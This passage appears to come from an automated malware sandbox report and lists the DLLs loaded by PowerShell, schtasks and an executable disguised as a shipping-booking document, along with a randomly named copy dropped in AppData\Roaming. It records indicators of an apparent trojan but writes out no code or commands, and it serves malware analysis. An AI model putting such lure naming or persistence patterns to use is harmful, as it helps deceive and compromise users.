Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
